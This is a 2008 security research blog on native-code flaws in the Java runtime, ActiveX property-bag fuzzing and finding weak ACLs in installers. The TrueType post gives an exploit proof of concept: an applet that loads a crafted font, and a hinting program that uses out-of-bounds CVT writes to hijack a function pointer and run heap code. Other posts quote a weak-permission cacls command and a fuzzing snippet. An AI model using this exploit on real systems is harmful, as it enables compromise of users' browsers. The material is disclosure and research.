Wednesday, 30 January 2008

Three Categories of Buffer Overflow in the JRE

Some people think that writing code in Java is a silver bullet against implementation flaws such as buffer overflows. The truth is a little murky. Certainly, there is no provision for overflows in pure Java code; reading or writing past the end of an array generates an exception, as the following toy code demonstrates:

public class overflow {
    public static void main(String args[]) {
        char buf[] = new char[10];
        String src = args[0];

        // No explicit bounds check here; the JVM checks every array write
        for (int i = 0; i < src.length(); i++)
            buf[i] = src.charAt(i);

        System.out.println("buf is " + new String(buf));
    }
}

C:\dev>java overflow foobar1234
buf is foobar1234

C:\dev>java overflow foobar12345
Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: 10
at overflow.main(

But real code, though it might be written in 100% Java, depends heavily on the Java Runtime Environment (JRE), and the JRE contains methods that are written in straight C. We all know what happens when C hangs out with its buddies: a fixed-size buffer, strcpy and user input.

So how do you even start to assess the attack surface of the JRE? Perhaps I'll go into this in more detail in a future post if anyone is interested, but briefly for now, if we discard logical flaws in the JRE that let you escape the sandbox (as attempting to measure exposure to these is really hard) and concentrate solely on the native code parts, we can:

  • Determine the amount of native code within the JRE:

    • Download the Java source code and search for the JNIEXPORT and JNICALL macros to detect native methods, e.g.:


      JNIEXPORT jboolean JNICALL
      Java_sun_awt_image_GifImageDecoder_parseImage(JNIEnv *env,
      jobject this,
      jint relx, jint rely,
      jint width, jint height,
      jint interlace,
      jint initCodeSize,
      jbyteArray blockh,
      jbyteArray raslineh,
      jobject cmh)

    • Or alternatively dump the exports of the DLLs within the JRE bin directory, e.g.:

      C:\dev> dumpbin /exports jpeg.dll | findstr /c:"_Java_"


    • Or enumerate all methods of all classes in the runtime and count up those marked as native. This can be done in a few lines of code using the Byte Code Engineering Library (BCEL), a great project for low level manipulation and construction of classes.

  • With a list of the native methods, perform some static analysis to score each method - how much code does it contain (including all the code within all function calls), does it process data that might be untrusted and so on.

  • Now trace or perform static analysis on your application - your applet, servlet etc. - to determine which methods you touch.
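As a rough illustration of the "count up those marked as native" step, here is a minimal sketch. It uses plain reflection rather than BCEL, which is a swapped-in technique: BCEL reads class files directly, whereas reflection has to load each class first. The class name NativeCounter and its helper are hypothetical, and only methods declared directly on each class are counted.

```java
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;

class NativeCounter {
    // Count the methods declared directly on a class that carry the native modifier.
    static int countNative(Class<?> c) {
        int n = 0;
        for (Method m : c.getDeclaredMethods()) {
            if (Modifier.isNative(m.getModifiers())) {
                n++;
            }
        }
        return n;
    }

    public static void main(String[] args) throws Exception {
        // Class names are supplied on the command line, e.g. java.lang.Object
        for (String name : args) {
            Class<?> c = Class.forName(name);
            System.out.println(name + ": " + countNative(c) + " native method(s)");
        }
    }
}
```

To cover the whole runtime you would still need a list of class names to feed in, which is where a class-file library such as BCEL is the better fit.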

But I digress. The main point of this post is to highlight three categories of buffer overflow that exist within the JRE, so here they are:

  1. Buffer overflows in file format parsers

    Much of the JRE file format parsing code is implemented in native code, typically either for speed or because the code originated elsewhere. This includes BMP, GIF, JPEG, ICC, TTF and Soundbank parsing, and a few I've probably forgotten.

    Incidentally I was first alerted to this when a Java application I was running (it happened to be Burp Proxy, seriously!) started crashing, leaving the familiar hs_err.log file behind. The log showed that I was triggering an access violation in fontmanager.dll, which I tracked down to a corrupted TrueType font I had in my fonts folder (TrueType fonts are hard things to parse - there's a mixture of 16 and 32 bit fields, lengths, offsets and to cap it all, provision for a virtual machine, as you'll already know if you read my last post!).

    Chris Evans did some great write ups on the bugs he found in the JRE image parsers here and here.

  2. Buffer overflows in the platform API wrapper code

    In addition to file format parsers, methods that interact with the OS are also ultimately implemented in native code as they need to call the appropriate platform API. These methods typically need to convert Java datatypes such as a String into a C datatype, such as a wide character array. Sound like a potentially hazardous operation? Well my colleagues at NGS, Wade Alcorn ("The King of BeEf") and Marcus Pinto (of Web Application Hacker's Handbook fame) found such a bug in BEA's JRockit JVM. The NGS advisory is here. This issue could be triggered remotely as an unauthenticated user against WebLogic Server by requesting a long URL (!) which triggered an overflow as the path was canonicalised.

  3. Buffer overflows in the underlying platform APIs

    The previous category comes about from insecurely preprocessing data before handing it off to a platform API. Let's consider the opposite - doing no processing and exposing a bug in a platform API. A notable example of this category is a critical vulnerability discovered by Peter Winter-Smith, another colleague of mine at NGS. He found an overflow that could be triggered by passing a string of 65536 bytes to gethostbyname, exported by ws2_32.dll. This issue was fixed in MS06-041 (NGS advisory here). It was trivial to generate Java code to hit this bug.

    Now you may be thinking that it isn't really fair to call this a Java problem as it is clearly an OS/third party library bug. Perhaps it isn't fair :) It is interesting though that in some areas of the JRE, the layer on top of the platform APIs is so thin that these types of bug are exposed (I think Peter actually found the gethostbyname bug while testing a Java application!) Also note that this further complicates attack surface analysis :(

A final note on how these affect different types of Java application. The example I gave in (2) is a clear example of a buffer overflow in the Java runtime that can be used to compromise a server. The examples in (1) and (3) less so. It's feasible that a Java Enterprise application may parse a file uploaded by a user but it obviously depends on the purpose of the servlet. On the other hand, a malicious applet that attempts to exploit the browser through a file format bug in the JRE is certainly conceivable.

And as for mobile Java, their runtime implementations do not typically share the native code components with the desktop JRE so the chances of there being an all conquering cross-device cross-architecture cross-Java implementation vulnerability are pretty slim (despite news to the contrary), though I'll stop short of saying impossible :)



Thursday, 24 January 2008

A Cross-browser, Cross-platform, Cross-architecture Bug in the JRE


In October 2007 I released an advisory for a bug in Sun's Java Runtime Environment versions 1.5.0_09 and below (NGS link here, SunSolve here). The bug in question allowed an attacker to craft a malicious TrueType font that could execute arbitrary native code when processed by a Java applet, thus compromising the browser. I gave partial details in the original advisory but have decided to discuss it in a bit more detail here.

What makes TrueType fonts more interesting than a run-of-the-mill file format is that they contain code. Surprising as it may seem, TrueType fonts can contain instructions for a virtual machine. Wikipedia has a good summary:

TrueType systems include a virtual machine that executes programs inside the font, processing the "hints" of the glyphs. These distort the control points which define the outline, with the intention that the rasterizer produces fewer undesirable features on the glyph. Each glyph's hinting program takes account of the size (in pixels) that the glyph is being displayed at, as well as other less important factors of the display environment.

Although incapable of receiving input and producing output as normally understood in programming, the TrueType hinting language does offer the other prerequisites of programming languages: conditional branching (IF statements), looping an arbitrary number of times (FOR- and WHILE-type statements), variables (although these are simply numbered slots in an area of memory reserved by the font), and encapsulation of code into functions. Special instructions called "delta hints" are the lowest level control, moving a control point at just one pixel size.

So to the flaw in the JRE. Firstly I should state that the TTF parsing code and the virtual machine were written in C (not Java) and exposed via JNI. This means we are into the realms of common implementation flaws - buffer overflows, integer overflows and the like.

The VM implements two instructions for writing values to the Control Value Table (CVT). The CVT holds global variables that can be used by multiple glyphs - it's basically a global data store. One of the instructions for writing to the CVT did not verify that the supplied index lay within the bounds of the CVT. This allows us to write a scaled value relative to the base of the CVT. Through experimentation (though this is probably documented somewhere) I determined that the scaling factor is based on the requested size of the font - setting this to 32 results in a factor of 1.

Since the CVT is dynamically allocated we don't quite have an arbitrary write to an arbitrary location yet. We must first determine where the CVT is located. Fortunately the instruction to read from the CVT also doesn't validate its index so we can read memory relative to the CVT. Again from experimentation I determined that at 0x38 DWORDs prior to the CVT (i.e. a negative offset) there is a pointer that points to the end of the CVT. Given that we know the size of the CVT we can determine the base of the CVT and therefore write an arbitrary value to an arbitrary location.
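The address arithmetic described above can be sketched as follows. This is only a worked illustration under stated assumptions: 4-byte CVT entries, a scaling factor of 1, and made-up pointer values in main. The class CvtMath and its method names are hypothetical; the function pointer table address and function number are the ones used in the TTI listing in this post.

```java
class CvtMath {
    static final int ENTRY_SIZE = 4; // assumption: each CVT entry is one DWORD

    // Base of the CVT, given the leaked end-of-CVT pointer and the number of entries.
    static long cvtBase(long endOfCvt, int entries) {
        return endOfCvt - (long) entries * ENTRY_SIZE;
    }

    // Index that makes base + index * ENTRY_SIZE land on the target address
    // (negative when the target lies below the CVT).
    static long indexFor(long target, long base) {
        return (target - base) / ENTRY_SIZE;
    }

    // Address of one slot in a table of 4-byte function pointers.
    static long slotAddress(long tableBase, int functionNumber) {
        return tableBase + (long) functionNumber * ENTRY_SIZE;
    }

    public static void main(String[] args) {
        long end = 0x02A41004L;             // made-up leaked pointer
        long base = cvtBase(end, 1);        // a CVT holding a single entry
        long slot = slotAddress(0x6D27BB00L, 0x89);
        System.out.println("base  = 0x" + Long.toHexString(base));
        System.out.println("slot  = 0x" + Long.toHexString(slot));
        System.out.println("index = " + indexFor(slot, base));
    }
}
```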

The nice thing about this bug is that we can repeatedly call the write primitive above which means there are countless ways to exploit it. I chose to overwrite a function pointer for one of the virtual instructions, then call this instruction. The value I overwrite the function pointer with (i.e. the address of my payload) is the address of the CVT itself. What about DEP? Java and DEP don't get along so the chances are, if the user has used the Java plugin before, DEP will be disabled. This means we can execute our payload straight from the heap.

Here's what you'll need to write a PoC:

  1. First, the easy bit, a Java applet to load the font. For convenience's sake we can package the font with the applet inside a JAR file. The alternative is that we load the font from a web server (subject to the same origin policy, of course) or that we put it inside our class file as an array of bytes, accessed via a ByteArrayInputStream. To trigger the bug and execution of our TTF instructions we simply call createFont, set the font to the appropriate size and render some text:

    InputStream is = this.getClass().getResourceAsStream("exploit_font.ttf");
    Font font = Font.createFont(Font.TRUETYPE_FONT, is);
    font = font.deriveFont(32.0f);
    Graphics g = this.getGraphics();
    // Select the derived font so that drawString actually renders with it
    g.setFont(font);
    g.drawString("This will trigger the bug", 20, 20);

  2. Next on to the font itself. Documentation on the TrueType instruction set may be found here. To construct the font I used the TTIComp TrueType instruction compiler. TTIComp takes as input a TTI file (containing our functions) and a TTF file. It produces a new TTF containing our compiled functions. TTIComp comes with some examples and a great tutorial for getting started.

  3. And finally the TTI itself. It looks something like this:

    #input "original_font.ttf"
    #output "exploit_font.ttf"

    #cvt cvt0: 0

    // This is our definition of the preparation
    // function
    // This will get called repeatedly when rendering
    // text in this font

    void prep()
    {
        // Function 0x89 is getInformation
        int iFn = 0x89;

        // Address of function pointer table for
        // JRE 1.5.0_07
        int iFnPtrTable = 0x6D27BB00;

        // End of CVT
        int iEndCVT = int(getCVT(uint(-0x38)));

        // Location we need to overwrite
        int iLocation = iFnPtrTable + int((fixed(iFn) * 4.0));

        // Fill CVT with our payload (some int 3's)
        setCVT(uint(0), 0xCCCCCCCC);

        // Perform overwrite
        // We subtract 4 from iEndCVT to get the address
        // of the start of the CVT (i.e. the address of
        // our payload)
        setCVT(uint(fixed(fixed((iLocation - iEndCVT)) / 4.0)), iEndCVT - 0x4);

        // Trigger payload by calling getInformation
    }

You'll note that I use a hardcoded address for the table of instruction pointers. I'm lazy, sue me. I suspect the base address of fontmanager.dll, the DLL containing the font parsing code, doesn't move across versions of the JRE so you could scan for the table fairly easily.

And our payload of int3's isn't very interesting. Ideally our stager payload should allocate some memory, copy our second stage payload into it and kick off a new thread from this address. This ensures that the Java plugin/font manager code can keep running as normal (we don't want to be executing code from the CVT when the font's resources are freed).

Finally, what makes bugs in the Java plugin so dangerous is that most of them can be exploited cross-browser, cross-platform, cross-architecture. To write an exploit capable of this, create TTFs as above but with payloads specific to a particular scenario (OS) and add some logic to determine which font to render. An unsigned applet can read system properties such as os.arch to assist in this.
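For reference, here is a minimal sketch of reading the standard platform properties from Java. os.name and os.arch are standard system property keys; the PlatformInfo class and its osFamily helper are hypothetical, and the coarse family labels are just one possible way to bucket the values.

```java
import java.util.Locale;

class PlatformInfo {
    // Reduce the os.name property to a coarse family label.
    static String osFamily(String osName) {
        String n = osName.toLowerCase(Locale.ROOT);
        if (n.startsWith("windows")) return "windows";
        if (n.startsWith("mac")) return "mac";
        if (n.startsWith("linux")) return "linux";
        return "other";
    }

    public static void main(String[] args) {
        String name = System.getProperty("os.name");
        String arch = System.getProperty("os.arch");
        System.out.println(name + " / " + arch + " -> " + osFamily(name));
    }
}
```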

That wraps up discussion of this bug. I'll be posting more on specific Java plugin issues in the coming months and I have a post in the pipeline that debunks the most common Java security misconceptions so keep an eye out for that.



Thursday, 17 January 2008

Fuzzing ActiveX? Don't Forget The Property Bags

(Note: I have a back log of posts so I'll be posting a fair amount over the next month)

There are several tools out there to fuzz ActiveX controls. COMRaider is one such tool, which is a useful addition to any bug hunter's toolkit. I am going to discuss a limitation that you should be aware of if you are testing ActiveX controls, namely that it doesn't fuzz property bags.

I was going to start by reproducing the definition of the OBJECT tag from the HTML DTD but it's pretty big, so here's an example instead:

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase=",0,40,0" width="300" height="120">
<param name="movie" value="flash.swf">
<param name="quality" value="high">
<param name="bgcolor" value="#FFFFFF">
</object>

In order to investigate the methods and get/set-able properties of a particular ActiveX control such as the Shockwave plugin, we can fire up the Microsoft OLE/COM Object Viewer (oleview), or programmatically create the object and ask it what it does through the IDispatch interface.

But methods and properties are not the only way we can interact with ActiveX controls. What about the name value pairs supplied via the PARAM tag above (movie, quality and bgcolor)? What other parameters might our target control accept, and how do we determine these? Well we have three options:

  1. Search for web pages that instantiate the control and note the parameters they pass (or the control's documentation in the case of a control like Shockwave). This approach is fine for obtaining the normal use parameters, but what if the control has interesting debug parameters that are undocumented?

  2. Run "strings" over the binary and treat each character string as the name of a parameter. This approach is viable but, depending on the number of strings returned, may result in an unrealistic number of test cases.

  3. Implement the required ActiveX container interfaces and let the control tell us what parameters it will accept. Clearly an optimal approach, this is what we shall focus on.

The parameter mechanism is implemented by the IPropertyBag interface in the container (i.e. Internet Explorer, your fuzzer, TstCon) and the IPersistPropertyBag interface in the control itself. There are also enhanced versions of these interfaces, IPropertyBag2 and IPersistPropertyBag2 though most controls I've seen don't use these (in fact the QuickTime plugin is one of the only controls I've seen with an IPersistPropertyBag2).

So in order to enumerate a control's parameters, all we have to do is implement IPropertyBag. This is actually pretty simple, since the interface only exposes two methods:

Read: Tells the property bag to read the named property into a caller-initialized VARIANT.
Write: Tells the property bag to save the named property in a caller-initialized VARIANT.

Time for an example. A while back when first looking into property bags I discovered a bug in the version of Yahoo! Messenger I happened to have installed. As it turned out, I had an outdated version and newer versions had fixed the issue, which had been reported to Yahoo! by iDefense.

There was a heap overflow in ymmapi.dll within the safe-for-scripting ymmapi.ymailattach.1 component. The vulnerable version of the control is still hosted here in a signed CAB file, though I warned them of this in November '06. The idea of flawed but signed code floating around the Internet is a scary one, though the logistics of dealing with this are more of a Microsoft ActiveX design problem which I will discuss another time.

Back to the example in hand. Let's see how we can programmatically enumerate the supported parameters, pass a long string to each of them, locate the overflow and generate some equivalent HTML. I'm not going to give you the actual code (where's the fun in that?) but here's the set of steps required:

1. Initialise COM via CoInitialize.

2. Convert the supplied ProgID into a CLSID via CLSIDFromProgID if you don't already have it.

3. Create an instance of the ActiveX control via CoCreateInstance.

4. Call QueryInterface to request the IPersistPropertyBag interface.

5. Call the Load method of this interface passing it a pointer to our IPropertyBag implementation. Implementing a rudimentary IPropertyBag is simple - if you're happy to break the rules of COM for a simple PoC just implement stubs for QueryInterface, AddRef, Release and Write (obviously not recommended if you want to write anything more than a PoC). The only method that actually needs to do anything is Read.

6. The Read method of our IPropertyBag will be called each time the control requests the value of a specific parameter. We must reply with a VARIANT of type BSTR. Supply an empty string if you just want to enumerate the parameters or return your fuzz string. Once we trigger heap corruption, our process will AV so it's best to run it in a debugger (and enable page heap with gflags).
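The callback pattern in steps 5 and 6 can be modelled without any COM at all. The sketch below is a pure Java simulation, not the real interfaces: PropertyBag stands in for the container's IPropertyBag (only Read is modelled), fakeControlLoad stands in for a control's Load method, and every name in it is hypothetical. The point is simply that the names the control asks for are the parameters it supports.

```java
import java.util.ArrayList;
import java.util.List;

class PropertyBagSketch {
    // Stand-in for the container-side property bag; only Read is modelled.
    interface PropertyBag {
        String read(String name);
    }

    // Records every property name the control asks for and answers with a fixed value.
    static class RecordingBag implements PropertyBag {
        final List<String> requested = new ArrayList<>();
        final String reply;

        RecordingBag(String reply) {
            this.reply = reply;
        }

        public String read(String name) {
            requested.add(name);
            return reply; // empty string to enumerate, a long string to fuzz
        }
    }

    // Stand-in for a control's Load: it pulls each parameter it understands from the bag.
    static void fakeControlLoad(PropertyBag bag, String... knownParams) {
        for (String p : knownParams) {
            bag.read(p);
        }
    }

    public static void main(String[] args) {
        RecordingBag bag = new RecordingBag("");
        fakeControlLoad(bag, "movie", "quality", "bgcolor");
        System.out.println("Parameters requested: " + bag.requested);
    }
}
```

In a real harness the recording happens inside your IPropertyBag::Read implementation and the reply is a BSTR VARIANT, as described in the steps above.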

If you go through the above steps and run your code on the ymmapi.ymailattach.1 control (having registered the control with regsvr32 first if you downloaded the CAB), you should find it breaks soon after receiving a long string in response to the Read for the "TextETACalculating" property.

Generating an HTML test case to reproduce this is easy - use JavaScript to dynamically create an OBJECT tag and the following function to build a string of suitable length (which I borrow from here):

String.prototype.repeat = function(l) {
    return new Array(l+1).join(this);
};

var fuzzstring = "a".repeat(50000);

Giving you something like this when you load it into IE and your debugger kicks in:

The obligatory OllyDbg shot

So that's it for now. I'll be posting more on ActiveX in future posts. I want to cover killbits, ActiveX design limitations, and how to detect and handle sitelocking when fuzzing.



Wednesday, 16 January 2008

Hunting Bugs Pre-Installation

There are many things that can be automated in security testing, with the goal of freeing up time to perform manual analysis of interesting areas (or for pub lunches or playing pool etc.) Fuzzing is a great example of this - you leave the fuzzer crunching away while you review the source code or disassembly.

But fuzzing is just part of the work that needs to be done. If I have some downtime between consultancy gigs and I decide to do some bug hunting, I have to first choose a product that I think will have some interesting components, then I have to install it, then I have to do a quick informal analysis of its attack surface, then I have to attack it. I have been thinking for a while about how we can automate these other areas:

  1. Target selection. This really depends on what sort of technologies you are interested in testing, e.g. if I've created a new file format fuzzer, I'll want to test it out on some client side apps. Similarly, if I'm researching RPC, I'd favour server side apps. We can therefore choose a target by ranking various technologies and performing some pre-installation analysis of the product - does it install a system service? Does it install a driver? Does it register a protocol handler? And so on (there are many, many more we could use).

  2. Installation. This is normally easy to script - we can fire up a clean VM and silently install our target app into it. Depending on the app, we might have to configure some settings manually, and we probably want to be running standard tools such as Filemon/Regmon/Procmon so we know exactly what is installed.

  3. Testing. If we knew in advance, or at least at runtime, what technologies the application installed we could set up specific fuzzers, e.g. if we know it registers handlers for certain filetypes we might automate retrieving some sample files from our zoo of interesting test cases, or if it's an unknown filetype to us, from Google.

Further thinking on the above led me to consider what types of vulnerability we can easily spot without even installing the product - i.e. just from an analysis of the install files. I say "easily" spot, since you could argue that we could just perform static analysis of the application binaries to find bugs with no need for any dynamic analysis! I am interested in looking for specific issues or classes of issue that can be spotted from simple analysis of the install files. I will leave the discussion of installation time issues (such as this) for another day.

Installers for enterprise level software typically use Windows Installer or InstallShield. Much of the discussion that follows is focused on MSIs, the file format of the Windows Installer. An MSI file is essentially a database inside a structured storage document. The database holds information about what needs to be done - which keys need to be put in the registry, which files need to be unpacked and where, which drivers need to be installed and so on. The MSI API provided within the platform SDK has functions for creating, opening, querying and updating databases. The query language is SQL. Perhaps the easiest way of investigating an MSI is with Orca (if you view an MSI with a structured storage viewer such as SSView, the stream names will appear corrupt, although you will no doubt recognise some of the content of the streams themselves as CAB files - more on this later).

Orca is a command line and GUI-based tool for viewing and modifying MSI table data. It is included with the Windows SDK Components for Windows Installer Developers but can be found elsewhere if you don't feel like downloading 300 MB to get it :)

Orca, examining the File table

Let's take a quick look at one of the interesting tables. The rest of them are documented here.

  • LockPermissions - The LockPermissions table deals with ACLs. MSDN states "it can be used to secure individual portions of an application in a locked-down environment. It can be used with the installation of files, registry keys, and created folders." However, note that it can be used to set any required ACL on a resource - i.e. it can be used to set a weak ACL on a shared resource and, used incorrectly, can introduce vulnerabilities.

Now let's look at a real world example. In August 2007 Dominic Beecher, a colleague of mine at NGS, released a privilege escalation advisory for the Cisco VPN client. Versions prior to set an ACE that allowed interactive users to modify files in the installation directory, easily detectable from cacls.exe or accesschk.exe:

C:\Program Files>accesschk -d -s -w "NT AUTHORITY\INTERACTIVE" .

AccessChk v2.0 - Check account access of files, registry keys or services
Copyright (C) 2006 Mark Russinovich
Sysinternals -

RW C:\Program Files\Cisco Systems\VPN Client\
RW C:\Program Files\Cisco Systems\VPN Client\accessible\
RW C:\Program Files\Cisco Systems\VPN Client\Help\
RW C:\Program Files\Cisco Systems\VPN Client\include\
RW C:\Program Files\Cisco Systems\VPN Client\Languages\
RW C:\Program Files\Cisco Systems\VPN Client\Resources\
RW C:\Program Files\Cisco Systems\VPN Client\search\
RW C:\Program Files\Cisco Systems\VPN Client\Setup\
RW C:\Program Files\Cisco Systems\VPN Client\shared\

Based on our discussion of the LockPermissions table above, you might expect to see an entry in this table for the installation directory, but if you open up a vulnerable version of the client MSI (e.g. vpnclient-win-msi- in Orca, you won't find one. How does the installer set this ACE? Before we solve this, let's consider the InstallShield way of doing things.

InstallShield stores installation data in script files which have the extension INS prior to version 6, and INX post v6. There are many tools to decompile these files; the two most widespread seem to be isDcc and Sid. I was browsing some sample InstallShield code here and noticed two samples for setting ACLs. The first builds an ACL then calls the standard Win32 API, SetNamedSecurityInfo. This is a lot of work compared to the second solution, which simply calls cacls.exe to do the heavy lifting. With this in mind, let's see how the InstallShield version of a vulnerable Cisco VPN client does things (vpnclient-win-is-

@0000D71F:0006 local_string2 = local_string1;
@0000D729:0021 LongPathToQuote(local_string2, 1);
@0000D737:0007 local_string2 = (local_string2 + " /t /e /g \"NT AUTHORITY\\INTERACTIVE\":C");
@0000D76A:0021 function_264("cacls.exe", local_string2, -1);

If you trace this fragment back a little in the decompiled script you'll find it assigns the installation directory to a global string and calls a function that executes this code.

So back to the MSI, now we have a big clue. Could it be that this particular MSI also calls cacls.exe? Searching in Orca for cacls.exe proves this is the case. The CustomAction table contains the entry:

CsCaExe_SetVpnClientFolderACL 3170 SystemFolder cacls.exe "[INSTALLDIR]." /t /e /g "NT AUTHORITY\INTERACTIVE":C

Et voilà. The MSI API is very simple to use, so it's easy to knock up a tool that scans for interesting LockPermissions entries and scans CustomAction for any exes that are launched, paying particular attention to cacls.exe entries.
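The CustomAction half of such a tool might look something like the sketch below. It assumes the rows have already been pulled out of the MSI by some other means (the MSI API itself is not called here) and are held as string arrays in the table's column order of Action, Type, Source, Target. The class and method names are hypothetical, and the match on a cacls.exe grant switch is a deliberately crude heuristic.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;

class CustomActionScan {
    // Return the Action names of rows whose Target launches cacls.exe with a grant (/g) switch.
    static List<String> flagCaclsGrants(List<String[]> rows) {
        List<String> hits = new ArrayList<>();
        for (String[] row : rows) {
            String target = row[3].toLowerCase(Locale.ROOT);
            if (target.contains("cacls.exe") && target.contains(" /g ")) {
                hits.add(row[0]);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        List<String[]> rows = new ArrayList<>();
        // The entry quoted above from the vulnerable Cisco VPN client MSI
        rows.add(new String[] {
            "CsCaExe_SetVpnClientFolderACL", "3170", "SystemFolder",
            "cacls.exe \"[INSTALLDIR].\" /t /e /g \"NT AUTHORITY\\INTERACTIVE\":C"
        });
        // A made-up harmless row for contrast
        rows.add(new String[] { "LaunchReadme", "226", "INSTALLDIR", "notepad.exe readme.txt" });
        System.out.println("Suspicious custom actions: " + flagCaclsGrants(rows));
    }
}
```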

There are several other vulnerabilities we can potentially detect prior to installation:

  • Hardcoded service passwords. Interestingly, the ServiceInstall table has a password column, from MSDN:

    "This string is the password to the account name specified in the StartName column. Note that the user must have permissions to log on as a service. The service has no password if StartName is null or an empty string. The Startname of LocalSystem is null, and therefore the password in this instance is null, so most services leave this column blank."

  • Outdated, vulnerable versions of common libraries such as Zlib, OpenSSL, LibCurl and so on.

    A note on extracting files from MSIs - if all you want to do is check the file version, it may not be necessary to extract it - check the Version field of the File table first. If you do need to extract the file, there are many tools out there that can do this. The basic premise is to look up the target file's Sequence in the File table then cross-reference this with the LastSequence column in the Media table to get the CAB file name. If the CAB file name starts with '#' then this indicates it's stored as a stream inside the MSI (remember it's a structured storage document). The last thing to add is that if you go looking for a stream name corresponding to the CAB name, you'll be out of luck. The stream name is an encoded version of the CAB name. My advice for anyone intending to roll their own file extraction code is to take a look at the Wine MSI implementation first; this will hopefully save you some time.
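The Sequence to CAB lookup can be sketched as below. It assumes the Media table rows have already been read and sorted by ascending LastSequence, and it represents them as two parallel arrays purely for brevity. The CabLookup class, its method names and the sample data are all hypothetical, and decoding the stream name is not attempted.

```java
class CabLookup {
    // Find the cabinet for a file: the first Media row whose LastSequence
    // is greater than or equal to the file's Sequence. Returns null if none matches.
    static String cabinetFor(int fileSequence, int[] lastSequence, String[] cabinet) {
        for (int i = 0; i < lastSequence.length; i++) {
            if (fileSequence <= lastSequence[i]) {
                return cabinet[i];
            }
        }
        return null;
    }

    // A leading '#' means the cabinet is stored as a stream inside the MSI.
    static boolean isEmbedded(String cabinetName) {
        return cabinetName != null && cabinetName.startsWith("#");
    }

    public static void main(String[] args) {
        int[] lastSequence = { 120, 340 };             // made-up Media rows
        String[] cabinet = { "#Data1.cab", "Data2.cab" };
        String cab = cabinetFor(200, lastSequence, cabinet);
        System.out.println(cab + (isEmbedded(cab) ? " (embedded stream)" : " (external file)"));
    }
}
```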

Of course, once you get into performing static analysis of the application binaries themselves there are many more issues you can alert on reasonably easily such as service binaries with RPC interfaces without security callbacks, drivers with calls to IoCreateDeviceSecure with permissive SDDL strings and so on. These could form the basis of a nifty attack surface analysis tool... which I have done some initial work on. If anyone is interested in taking this further, or has additional vulnerabilities we can spot pre-installation, get in touch.



Hello World

So I'm blogging! This momentous event was largely brought about by the huge amount of travelling I did in December. What made these trips different to ones gone by, is that I had a new laptop with me that has a battery that can actually last longer than the time it takes to boot Vista (good job I was flying back and forth across the Atlantic or Sidebar might never have finished loading).

Anyway, this blog will be 90% security related and will cover what I'm thinking, researching and presenting. My first few posts are going to be quite long. After that, it depends on time and enthusiasm.

Feel free to drop me a line if you're interested in anything I write about.